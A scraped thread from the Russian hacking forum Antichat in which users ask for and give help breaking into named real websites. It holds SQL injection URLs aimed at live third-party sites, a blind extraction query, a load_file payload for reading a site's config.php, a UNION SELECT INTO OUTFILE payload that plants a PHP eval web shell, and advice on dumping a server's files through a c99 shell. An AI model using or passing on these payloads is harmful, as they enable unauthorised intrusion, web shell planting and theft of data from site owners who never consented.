ANTICHAT - Ваши вопросы по уязвимостям.

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Ваши вопросы по уязвимостям. (https://forum.antichat.xyz/showthread.php?t=46016)

http://www.exportbureau.com/trade_leads.html?lead=99999999999999999999999999
Дальше стоит фильтрация на order by и union select
Че делать?

http://www.tbc-world.com/resprofile.asp?id=-5685946+order+by+25--&lng=en&companytype=2
Вот еще одна конторка. по моему тоже фильтрация стоит.

Народ есть шелл с99 от маднета
так вот нужно слить все файлы с сайта (знаю что обсуждался такой вопрос тут)
но на сервере стоит виндувс 2008 как тут тогда быть?

molotovkeyt, первая ссылка не открывается, вторая:

Цитата:

http://www.tbc-world.com/resprofile.asp?id=5685946+and+ascii(substring((sel ect+top+1+table_name+from+information_schema.table s),1,1))=84--

Цитата:

Сообщение от diznt

Вот, не помню кто вылаживал, скрипт на пхп,http://slil.ru/26579035. Еще можно попробывать архиваторы из unix - версии под windows,например tar, но я хз будет ли он работать под 2008.

вот еще что,
есть сайт, и если пройти по сылке sait.ru/upload.php?id=64 (сам файл)
то начнеться скачка файла, можно ли как нибуть скачать конфиг.пхп (выйдя за каталоги(если такое можно))
???
Кусочек кода при катором начинается скачка

Код:

<?php



include_once("init.php");



$GLOBALS['db']->Execute("SET NAMES utf8"); 

$st = $GLOBALS['db']->Prepare("SELECT `filename`, `origname` FROM ".DB_PREFIX."_demos WHERE demtype=? and demid=?");

$res = $GLOBALS['db']->Execute($st,array($_GET['type'],$_GET['id']));

header('Content-type: application/force-download');

header('Content-Transfer-Encoding: Binary');

header('Content-disposition: attachment; filename='.$res->fields[1]);

@readfile(SAVE_FILES . "/" . $res->fields[0]);

?>

SAVE_FILES - путь откуда скачиваються файл

Цитата:

Сообщение от diznt

неполучится скачать, нет SQL-инекции в запросе

http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql’])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'shell.php'

тоже нужно переводить в чар?

Цитата:

Сообщение от diznt

Код:

<?php



include_once("init.php");



$GLOBALS['db']->Execute("SET NAMES utf8"); 

$st = $GLOBALS['db']->Prepare("SELECT `filename`, `origname` FROM ".DB_PREFIX."_demos WHERE demtype=? and demid=?");

$res = $GLOBALS['db']->Execute($st,array($_GET['type'],$_GET['id']));

header('Content-type: application/force-download');

header('Content-Transfer-Encoding: Binary');

header('Content-disposition: attachment; filename='.$res->fields[1]);

@readfile(SAVE_FILES . "/" . $res->fields[0]);

?>

SAVE_FILES - путь откуда скачиваються файл

Цитата:

upload.php?id=-1+union+select+load_file('/folder/config.php'),2--+

первая сточка

Цитата:

тоже нужно переводить в чар?

необязательно (левая часть)

Цитата:

Сообщение от kevmen

http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql’])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'shell.php'

тоже нужно переводить в чар?

Нужен путь. Так тоже зальёт, но в папку с базой, из веба не увидешь. В чар нельзя путь переводить

'/путь/shell.php'

http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql’])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'http://target/shell.php'

так можно?jokester